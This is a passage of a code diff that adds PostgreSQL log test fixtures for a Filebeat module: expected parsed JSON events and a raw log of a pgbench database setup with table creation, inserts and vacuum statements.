"event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6435, + "message": "2021-03-17 15:18:04.152 UTC [154] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.152 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.156Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 4302000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6614, + "message": "2021-03-17 15:18:04.156 UTC [154] postgres@accounts LOG: duration: 4.302 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.156 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.156Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6691, + "message": "2021-03-17 15:18:04.156 UTC [154] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_branches(bid int not null,bbalance 
int,filler char(88)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.156 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.163Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 6999000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6859, + "message": "2021-03-17 15:18:04.163 UTC [154] postgres@accounts LOG: duration: 6.999 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.163 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.164Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6936, + "message": "2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: statement: begin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "begin", + "postgresql.log.timestamp": "2021-03-17 15:18:04.164 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.164Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 75000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7011, + "message": "2021-03-17 15:18:04.164 UTC [154] 
postgres@accounts LOG: duration: 0.075 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.164 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.164Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7088, + "message": "2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: statement: truncate table pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "truncate table pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:18:04.164 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.164Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 676000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7241, + "message": "2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: duration: 0.676 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.164 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.164Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + 
"event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7318, + "message": "2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.164 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 247000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7442, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.247 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7519, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": 
"postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 164000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7649, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.164 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7726, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 80000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7856, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.080 ms", + "postgresql.log.database": 
"accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7933, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 77000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8063, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.077 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8140, 
+ "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 75000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8270, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.075 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8347, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ 
+ "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 74000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8477, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.074 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8554, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 71000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8684, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.071 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + 
"postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8761, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 71000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8891, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.071 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 8968, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into 
pgbench_tellers(tid,bid,tbalance) values (8,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 69000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9098, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.069 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9175, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 71000, + 
"event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9305, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.071 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9382, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 72000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9513, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: duration: 0.072 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { 
+ "@timestamp": "2021-03-17T15:18:04.166Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9590, + "message": "2021-03-17 15:18:04.166 UTC [154] postgres@accounts LOG: statement: copy pgbench_accounts from stdin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "copy pgbench_accounts from stdin", + "postgresql.log.timestamp": "2021-03-17 15:18:04.166 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.355Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 188620000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9692, + "message": "2021-03-17 15:18:04.355 UTC [154] postgres@accounts LOG: duration: 188.620 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.355 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.355Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9771, + "message": "2021-03-17 15:18:04.355 UTC [154] postgres@accounts LOG: statement: commit", + "postgresql.log.database": "accounts", + "postgresql.log.query": "commit", + "postgresql.log.timestamp": "2021-03-17 15:18:04.355 UTC", + "process.pid": 154, 
+ "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.366Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 11135000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9847, + "message": "2021-03-17 15:18:04.366 UTC [154] postgres@accounts LOG: duration: 11.135 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.366 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.366Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 9925, + "message": "2021-03-17 15:18:04.366 UTC [154] postgres@accounts LOG: statement: vacuum analyze pgbench_branches", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_branches", + "postgresql.log.timestamp": "2021-03-17 15:18:04.366 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.383Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 16594000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10026, + "message": "2021-03-17 15:18:04.383 UTC [154] postgres@accounts LOG: duration: 16.594 ms", + 
"postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.383 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.383Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10104, + "message": "2021-03-17 15:18:04.383 UTC [154] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:18:04.383 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.386Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 3410000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 10204, + "message": "2021-03-17 15:18:04.386 UTC [154] postgres@accounts LOG: duration: 3.410 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.386 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + } +] \ No newline at end of file diff --git a/filebeat/module/postgresql/log/test/postgresql-9-log-statement-all.log b/filebeat/module/postgresql/log/test/postgresql-9-log-statement-all.log new file mode 100644 index 00000000000..ad7d979c681 --- /dev/null +++ b/filebeat/module/postgresql/log/test/postgresql-9-log-statement-all.log 
@@ -0,0 +1,230 @@ +2021-03-17 15:10:20.767 UTC [118] postgres@postgres LOG: statement: CREATE DATABASE accounts; +2021-03-17 15:10:21.486 UTC [118] postgres@postgres LOG: duration: 719.436 ms +2021-03-17 15:10:27.112 UTC [126] postgres@postgres LOG: statement: SELECT d.datname as "Name", + pg_catalog.pg_get_userbyid(d.datdba) as "Owner", + pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding", + d.datcollate as "Collate", + d.datctype as "Ctype", + pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges" + FROM pg_catalog.pg_database d + ORDER BY 1; +2021-03-17 15:10:27.115 UTC [126] postgres@postgres LOG: duration: 2.710 ms +2021-03-17 15:10:37.302 UTC [135] postgres@postgres LOG: statement: SELECT d.datname as "Name", + pg_catalog.pg_get_userbyid(d.datdba) as "Owner", + pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding", + d.datcollate as "Collate", + d.datctype as "Ctype", + pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges" + FROM pg_catalog.pg_database d + ORDER BY 1; +2021-03-17 15:10:37.303 UTC [135] postgres@postgres LOG: duration: 1.111 ms +2021-03-17 15:10:42.085 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_history +2021-03-17 15:10:42.085 UTC [137] postgres@accounts LOG: duration: 0.648 ms +2021-03-17 15:10:42.085 UTC [137] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22)) +2021-03-17 15:10:42.088 UTC [137] postgres@accounts LOG: duration: 3.140 ms +2021-03-17 15:10:42.089 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_tellers +2021-03-17 15:10:42.089 UTC [137] postgres@accounts LOG: duration: 0.229 ms +2021-03-17 15:10:42.089 UTC [137] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:10:42.092 UTC [137] postgres@accounts LOG: duration: 3.339 ms +2021-03-17 15:10:42.095 UTC [137] 
postgres@accounts LOG: statement: drop table if exists pgbench_accounts +2021-03-17 15:10:42.095 UTC [137] postgres@accounts LOG: duration: 0.229 ms +2021-03-17 15:10:42.095 UTC [137] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100) +2021-03-17 15:10:42.096 UTC [137] postgres@accounts LOG: duration: 1.494 ms +2021-03-17 15:10:42.097 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_branches +2021-03-17 15:10:42.097 UTC [137] postgres@accounts LOG: duration: 0.166 ms +2021-03-17 15:10:42.097 UTC [137] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100) +2021-03-17 15:10:42.099 UTC [137] postgres@accounts LOG: duration: 1.914 ms +2021-03-17 15:10:42.099 UTC [137] postgres@accounts LOG: statement: begin +2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: duration: 0.559 ms +2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0) +2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: duration: 0.399 ms +2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.281 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.090 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.077 ms +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0) +2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: 
